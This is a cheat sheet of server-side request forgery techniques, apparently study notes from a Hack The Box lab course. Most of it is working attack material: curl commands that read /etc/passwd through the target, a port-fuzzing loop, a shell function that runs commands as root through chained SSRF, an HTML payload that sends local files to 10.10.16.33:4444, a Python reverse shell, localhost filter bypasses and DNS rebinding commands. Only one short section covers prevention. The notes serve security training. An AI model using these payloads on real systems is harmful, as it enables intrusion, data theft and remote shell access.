
Exploiting SSRF vulnerabilities can lead to:

- Interacting with known internal systems
- Discovering internal services via port scans
- Disclosing local/sensitive data
- Including files in the target application
- 
- Leaking NetNTLM hashes using UNC Paths (Windows)
- Achieving remote code execution


We can usually find SSRF vulnerabilities in applications that fetch remote resources. When hunting for SSRF vulnerabilities, we should look for:

- Parts of HTTP requests, including URLs
- File imports such as HTML, PDFs, images, etc.
- Remote server connections to fetch data
- API specification imports
- Dashboards including ping and similar functionalities to check server statuses

# Regular SSRF

### Retrieving a remote file through the target application - HTTP Schema

```bash
curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"
```

### Retrieving a local file through the target application - File Schema

```bash
curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd" 
```


### Port Fuzzing

```bash
# generate port list
for port in {1..65535};do echo $port >> ports.txt;done

ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30
```

### cURL - Interacting with the Target

```bash
curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"
```

### Automate Executing Commands

```bash
function rce() {
function> while true; do
function while> echo -n "# "; read cmd
function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
function while> curl -s -o - "http://10.129.143.8/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
function while> echo ""
function while> done
function> }
```

```bash
rce
# whoami

<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=whoami  
</h1><a>root  
</a></body></html>

```

# Blind SSRF

Server-Side Request Forgery vulnerabilities can be "blind." In these cases, even though the request is processed, we can't see the backend server's response. For this reason, blind SSRF vulnerabilities are more difficult to detect and exploit.

### Blind SSRF Example

If a web application accepts html as an upload, you can potentially have it send you a request if it processes the html code.

```html
<html>
    <body>
        <b>Exfiltration via Blind SSRF</b>
        <script>
        var readfile = new XMLHttpRequest(); // Read the local file
        var exfil = new XMLHttpRequest(); // Send the file to our server
        readfile.open("GET","file:///etc/passwd", true); 
        readfile.send();
        readfile.onload = function() {
            if (readfile.readyState === 4) {
                var url = 'http://10.10.16.33:4444/?data='+btoa(this.response);
                exfil.open("GET", url, true);
                exfil.send();
            }
        }
        readfile.onerror = function(){document.write('<a>Oops!</a>');}
        </script>
     </body>
</html>
```

#### Python reverse shell 
```bash
export RHOST="10.10.16.33";export RPORT="9999";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

#### Reverse Shell via Blind SSRF
```html
<html>
    <body>
        <b>Reverse Shell via Blind SSRF</b>
        <script>
        var http = new XMLHttpRequest();
        http.open("GET","http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=stiff", true); 
        http.send();
        http.onerror = function(){document.write('<a>Oops!</a>');}
        </script>
    </body>
</html>
```


## Time-based SSRF
We can also determine the existence of an SSRF vulnerability by observing time differences in responses. This method is also helpful for discovering internal services.

# Basic Filter Bypasses

## Obfuscation of localhost

```
- Localhost Address Block: `127.0.0.0 - 127.255.255.255`
- Shortened IP Address: `127.1`
- Prolonged IP Address: `127.000000000000000.1`
- All Zeroes: `0.0.0.0`
- Shortened All Zeroes: `0`
- Decimal Representation: `2130706433`
- Octal Representation: `0177.0000.0000.0001`
- Hex Representation: `0x7f000001`
- IPv6 loopback address: `0:0:0:0:0:0:0:1` (also `::1`)
- IPv4-mapped IPv6 loopback address: `::ffff:127.0.0.1`
```

## Bypass via DNS Resolution

We can register a domain and point it to any internal IP address; however, we can abuse some already existing ones, such as `localtest.me`, which resolves to `127.0.0.1`:


```shell-session
nslookup localtest.me

Server:		1.1.1.1
Address:	1.1.1.1#53

Non-authoritative answer:
Name:	localtest.me
Address: 127.0.0.1
Name:	localtest.me
Address: ::1
```

## Bypass via HTTP Redirect

We can bypass the filter by providing a URL pointing to a web server under our control, redirecting the web application to the local debug endpoint. To do so, we can host the following PHP code on our web server:


```php
<?php header('Location: http://127.0.0.1/debug'); ?>
```

```bash
php -S 0.0.0.0:80
```

### Prevention

Preventing this is not a simple task. In the debug endpoint, it is impossible to distinguish a redirected request from a direct request. Blocking redirects completely might impact the user experience since benign web applications also use redirects. Furthermore, it is insufficient to block all HTTP redirects, as there are other ways to force a redirect, such as JavaScript and using `meta` tags. These cases need to be handled separately, for instance, by disabling JavaScript in the headless Chrome browser, downloading the HTML response first, and stripping meta tags that cause redirects before rendering the downloaded HTML file in the headless Chrome browser.

This demonstrates well why we should never implement security controls on our own. Due to the increased complexity and many edge cases, removing SSRF vulnerabilities entirely is challenging. Even if we successfully manage to prevent all forms of redirects, the filter can still be bypassed using DNS rebinding, as we will discuss in the upcoming section.

The simplest and safest way to prevent the SSRF vulnerability is via firewall rules. The system running Webshot (the sample web application) should be separated from the internal web application hosting the debug endpoint. Then, we can implement firewall rules to prevent incoming connections from the Webshot system to the internal web application to prevent SSRF vulnerabilities.

## DNS Rebinding

### Description

- We need to provide the web application with a domain under our control so that we can change its DNS configuration; for this section, suppose we own the domain `attacker.htb` and can change its DNS configuration. We will configure the DNS server to resolve `attacker.htb` to any IP address that is not blacklisted, such as `1.1.1.1`, and assign it a very low TTL.
 
- When we provide the web application with the URL `http://attacker.htb/flag`, it will resolve the domain name to `1.1.1.1` and verifies that it is not an internal IP address; since the function assigned to `global_check` evaluates to `True`, `global_check` becomes `True`. The `if` statement has both conditions evaluating to `True`, therefore allowing us access to the [render_template](https://flask.palletsprojects.com/en/2.0.x/quickstart/#rendering-templates) function.
- 
- Subsequently, we will `rebind` the DNS configuration for `attacker.htb` to resolve to `127.0.0.1` instead of `1.1.1.1`. When attempting to get the flag in the `flag` function, and because of the low TTL assigned to `attacker.htb`, the web application will resolve `attacker.htb` again.

- At last, due to the DNS rebinding, the second DNS resolution will resolve the domain name `attacker.htb` to `127.0.0.1` such that the web application accesses the URL `http://127.0.0.1/flag` and fetches the flag for us.

### Exploitation

To bypass the SSRF filter via DNS rebinding in the actual web application, we can use [rbndr.us](https://lock.cmpxchg8b.com/rebinder.html), a service that generates a domain name that randomly resolves to the two IP addresses specified:

#### Internal Webapps
A cleaner approach would be running our domain on our own DNS server. We can then conduct the DNS rebinding attack using a simple Python script such as [DNSrebinder](https://github.com/mogwailabs/DNSrebinder).

Let us assume we bought the domain `thisisthednsrebindingdomain.eu`. We need to configure an `NS` DNS entry for our domain to point to the IP address of our machine. This tells anyone resolving subdomains of `thisisthednsrebindingdomain.eu` to query our machine.

```bash
sudo python3 dnsrebinder.py --domain attacker.com --rebind 127.0.0.1 --ip 1.1.1.1 --counter 1 --tcp --udp
```